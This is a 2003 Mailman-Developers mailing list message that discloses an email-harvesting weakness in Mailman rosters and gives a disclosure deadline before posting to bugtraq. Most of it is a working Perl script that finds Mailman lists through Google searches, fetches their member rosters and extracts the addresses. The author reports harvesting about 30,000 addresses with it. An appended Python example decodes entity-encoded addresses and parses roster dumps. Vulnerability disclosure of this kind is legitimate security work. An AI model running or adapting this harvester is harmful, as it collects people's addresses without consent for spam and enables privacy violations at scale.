[Mailman-Developers] bugtraq submission warning: email address harvesting exploit

Bernhard Kuemel darsie at gmx.at
Tue Nov 25 12:46:40 EST 2003


David Champion wrote:
> * On 2003.11.16, in <3FB78C1A.5080702 at gmx.at>,
> 
>>This test may prevent users of non-graphical web browsers or email-only 
>>subscribers from subscribing.
> 
> I've generally found that encoding the address as HTML character
> entities works fine. I've had a bait address on my web page for quite
> some time, and it's never received any spam. It's readable to text
> browsers, it doesn't affect readability with unexpected font sizes, it
> takes little computation, and it's trivial to write.
> 
> My address would become:
> &#100;&#103;&#99;&#64;&#117;&#99;&#104;&#105;&#99;&#97;&#103;&#111;&#46;&#101;&#100;&#117;

While this approach may work in individual cases, it is trivially 
and quite likely defeated when the prize is 100,000 mailing lists 
with 1 to 5 million (!) high quality email addresses.

Since your answer is the only one and the problem does not appear 
to be addressed sufficiently, I wrote an example exploit program 
that finds Mailman lists and harvests their email addresses. 
After about 20 minutes it had collected about 30,000 email addresses: 
http://bksys.at/bernhard/30,000%20email%20addresses.gz

The program can be further improved. It can be parallelized a 
little. It can check a site for further mailing lists (the 
admin overview has a more complete list than the listinfo 
overview). And it can be made to subscribe to mailing lists where 
the member list is only available to the list members.

If you think the problem is worth fixing please estimate how long 
it will take and I will wait a reasonable time for a fix before I 
post the problem and the exploit code to bugtraq. Otherwise I 
will post to bugtraq in about 1 week.

Here is the exploit code:

-------------------------------------------------------------
#!/usr/bin/perl -w
use strict;

my $n = 0;   # addresses harvested so far
my $u = 0;   # roster URLs fetched so far

# Page through Google results (10 per page) for two phrases that appear
# on every Mailman listinfo page; stop at the first page with no hits.
for (my $i = 0; 1; $i += 10) {
    my $google = `lynx --dump 'http://www.google.com/search?q=%22Click+here+for+the+list%22+%22batched+in+a+daily+digest%22&start=$i'`;
#   print $google;
    # Pull the listinfo URLs out of the "cache:" links in the result page
    # (this matches the layout Google's result pages had in 2003).
    my @urls = $google =~ /cache:.{12}:(.*?)\+%22/g;
    last if $#urls == -1;
#   print join("\n", @urls);
#   print "\naoeu $#urls\n";

    foreach my $url (@urls) {
        $u++;
        # The member roster lives at the same path as the listinfo page.
        $url =~ s{/listinfo/}{/roster/};
        print "$url...\n";
        my $roster = `lynx -connect_timeout=10 -dump $url`;
#       print $roster;
        # lynx renders each member as "   * [N]user at domain" (members
        # with delivery disabled are shown in parentheses); Mailman prints
        # "@" as " at ", which is undone below.
        my @mails = $roster =~ /^ +\* \(?\[\d+\](.* at .*?)\)?$/mgo;
        foreach my $mail (@mails) {
            $mail =~ s/ at /@/;
            print "$mail\n";
            $n++;
        }
        print "mails=" . ($#mails + 1) . ", total=$n, url=$u, google=$i\n";
#       exit;
    } #foreach url
} #while google
-----------------------------------------------------------

Have a nice day, Bernhard

-- 
Webspace; low-end server housing from 15 EUR, etc.: http://www.bksys.at
Linux admin/programmer: http://bksys.at/bernhard/services.html
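Added example (not part of Bernhard's post and not Mailman's own code): the two
points the message makes, that numeric HTML entity encoding of an address is
undone by a single decoding call, and that a lynx dump of a Mailman roster page
yields addresses with one regular expression, as offline Python. The entity
string is the one quoted above; the roster dump is a constructed sample laid out
the way the Perl script's regex expects (the " * [N]user at domain" form, with
parentheses around members whose delivery is disabled), which is an assumption
about the rendered page rather than something taken from a live site.

```python
import html
import re

# Entity-encoded address exactly as quoted in the thread.
ENTITY_ENCODED = ("&#100;&#103;&#99;&#64;&#117;&#99;&#104;&#105;&#99;"
                  "&#97;&#103;&#111;&#46;&#101;&#100;&#117;")

# Constructed sample of a Mailman 2.x roster page as `lynx -dump` would show it.
# Assumption: Mailman writes each address as "user at domain", with members
# whose delivery is disabled wrapped in parentheses.
ROSTER_DUMP = """\
   Example-list Subscribers

     * [1]alice at example.com
     * [2]bob.smith at example.org
     * ([3]carol at example.net)
   ...
"""

# Plain-text address pattern applied after entity decoding.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Same shape as the Perl script's roster regex, with user and domain captured
# separately so the " at " obfuscation is undone in one step.
ROSTER_LINE_RE = re.compile(r"^ +\* \(?\[\d+\](\S+) at (\S+?)\)?$", re.M)


def decode_entities(text):
    """Collapse numeric and named HTML character entities back to text.

    This is all a harvester needs to defeat &#NNN; encoding of addresses.
    """
    return html.unescape(text)


def harvest_from_html(page):
    """Return every address found in a page after entity decoding."""
    return EMAIL_RE.findall(decode_entities(page))


def harvest_from_roster(dump):
    """Return de-obfuscated addresses from a lynx dump of a roster page."""
    return [f"{user}@{domain}" for user, domain in ROSTER_LINE_RE.findall(dump)]


if __name__ == "__main__":
    print(decode_entities(ENTITY_ENCODED))
    for addr in harvest_from_roster(ROSTER_DUMP):
        print(addr)
```

`html.unescape` is from the standard library; the point is that no custom work
is needed to reverse the encoding, so it buys nothing against a crawler that
decodes pages before scanning them.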